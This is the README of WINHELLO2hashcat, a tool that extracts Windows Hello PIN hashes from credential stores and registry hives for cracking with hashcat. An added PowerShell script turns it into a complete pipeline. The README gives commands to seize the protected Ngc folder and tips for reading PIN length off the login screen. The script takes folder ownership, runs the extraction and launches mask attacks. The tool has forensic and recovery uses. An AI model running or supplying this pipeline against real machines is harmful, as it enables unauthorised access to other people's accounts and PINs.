Banaanhangwagen, updated 🕥 2022-04-22 13:57:48

WINHELLO2hashcat

About

With this tool one can extract the "hash" from a Windows Hello PIN. This hash can be cracked with hashcat, more precisely with hash mode -m 28100 (Windows Hello PIN/Password).

This tool is extensively tested with:
- WIN_10 21H1 and 21H2
- WIN_11

Please read this post for more information: https://hashcat.net/forum/thread-10461.html

Requirements

The Python-package dpapick3 is needed.

Usage

```
λ python WINHELLO2hashcat.py --help
usage: WINHELLO2hashcat.py [--verbose] --cryptokeys CRYPTOKEYS --masterkey MASTERKEY --system SYSTEM --security SECURITY [--pinguid PINGUID | --ngc NGC] [--software SOFTWARE]

optional arguments:
  -h, --help             show this help message and exit
  --verbose              Verbose mode
  --cryptokeys CRYPTOKEYS
                         The "\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys" directory
  --masterkey MASTERKEY  The "\Windows\System32\Microsoft\Protect\S-1-5-18\User" directory
  --system SYSTEM        The "\Windows\System32\config\SYSTEM" hive
  --security SECURITY    The "\Windows\System32\config\SECURITY" hive
  --pinguid PINGUID      The PIN guid
  --ngc NGC              The "\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc" directory
  --software SOFTWARE    The "\Windows\System32\config\SOFTWARE" hive
  --windows PATH         The windows offline directory. It will autodetect the system, security, masterkey, cryptokeys, ngc and software arguments
```

- CRYPTOKEYS-folder, MASTERKEY-folder, SYSTEM and SECURITY hives are mandatory
- NGC-folder or PIN_GUID is mandatory
- SOFTWARE hive is optional; only needed to print the username
- `--windows PATH` replaces the individual path arguments when the whole Windows directory of an offline image is available

Remarks

  • On systems with a TPM (hardware or firmware versions), this script will not work: the keys it needs are protected by the TPM and cannot be recovered from the on-disk files.
  • When working with a mounted or live image, this script needs to be executed as an admin, and the NGC-folder requires SYSTEM privileges.
  • Run these two commands first so that the script can correctly access the NGC-folder:

    TAKEOWN /f %windir%\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc /r /D Y

    ICACLS %windir%\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc /grant "%username%":(F) /t

  • (Screenshot: login screen where the PIN is asked.) Notice that Windows auto-enters after the correct number of digits is entered. This tells you the PIN is numeric only and how long it is, which is exactly the mask length to use when cracking.
  • (Screenshot: login screen where the PIN is asked, but this time a letter/symbol has been added.) Notice that there is **no auto-enter** anymore, but an arrow is added to the field.
  • This script is provided as-is. Please report any issues.
  • Happy cracking!
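As an added example (not part of the WINHELLO2hashcat project or its README), the Usage and Remarks above as one PowerShell run on a live host: the TPM caveat check, the ownership fix on the Ngc folder (the TAKEOWN/ICACLS steps), the extraction via `--windows`, and a hashcat mask attack sized from the auto-enter observation. Assumptions: the script lives at `C:\tools\WINHELLO2hashcat.py`, `hashcat` is on PATH, the script prints the hash line to stdout, and a 28100 hash line starts with `$WINHELLO$` (the prefix used in hashcat's example-hash list); adjust if your copy behaves differently.

```powershell
# Added example, not project code. Assumed: script path, work dir, hashcat on
# PATH, hash line printed to stdout and starting with "$WINHELLO$".
#Requires -RunAsAdministrator
param(
    [string]$Script    = 'C:\tools\WINHELLO2hashcat.py',  # assumed location
    [string]$WinDir    = $env:SystemRoot,                # use e.g. E:\Windows for a mounted image
    [string]$WorkDir   = 'C:\tools\winhello',
    [int]   $PinLength = 6,        # digits typed before the login screen auto-entered
    [switch]$NonNumeric            # set if an arrow appeared instead of auto-enter
)

# 1. TPM caveat (live host only): a present TPM means the Ngc keys are sealed
#    in hardware and the script will not find usable key material.
if ($WinDir -eq $env:SystemRoot) {
    $tpm = Get-Tpm
    if ($tpm.TpmPresent) {
        Write-Warning "TPM present (ready: $($tpm.TpmReady)); the PIN keys are TPM-protected, extraction will fail."
    }
}

# 2. Ngc is SYSTEM-only: take ownership and grant Full control to the current
#    user, the same TAKEOWN/ICACLS steps as in the Remarks.
$ngc = Join-Path $WinDir 'ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc'
takeown /f $ngc /r /d y | Out-Null
icacls  $ngc /grant "$($env:USERNAME):(F)" /t | Out-Null

# 3. Run the extractor; --windows autodetects the hives, masterkey,
#    cryptokeys and Ngc folders under $WinDir. Keep the full output as a log.
New-Item -ItemType Directory -Force -Path $WorkDir | Out-Null
$out = & python $Script --windows $WinDir
$out | Set-Content -Path (Join-Path $WorkDir 'winhello.log')
if ($LASTEXITCODE -ne 0) { throw "WINHELLO2hashcat.py failed; rerun with --verbose and check winhello.log" }

# Assumed hash-line prefix; everything else (username etc.) stays in the log.
$hashes = @($out | Where-Object { $_ -match '^\$WINHELLO\$' })
if ($hashes.Count -eq 0) { throw "No hash line found in the output; see winhello.log" }
$hashFile = Join-Path $WorkDir 'winhello.hash'
$hashes | Set-Content -Path $hashFile

# 4. Mask attack. A numeric PIN auto-enters after its last digit, so the
#    observed digit count fixes the mask exactly. Without auto-enter the PIN
#    contains letters/symbols: walk lengths 4..8 over the full ?a charset
#    (an illustrative upper bound; raise it if nothing cracks).
if (-not $NonNumeric) {
    $mask = '?d' * $PinLength            # e.g. 6 -> ?d?d?d?d?d?d
    hashcat -m 28100 -a 3 $hashFile $mask
} else {
    hashcat -m 28100 -a 3 $hashFile ('?a' * 8) --increment --increment-min 4
}
```

For an offline image, mount it and pass `-WinDir 'E:\Windows'`: the ownership step is still needed on a mounted volume (see the Remarks), while the `Get-Tpm` check is skipped because it would only describe the analysis machine, not the imaged one. The numeric branch is cheap because the mask is exact; the `?a` branch is the expensive case and is where knowing the length from the login screen pays off most.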
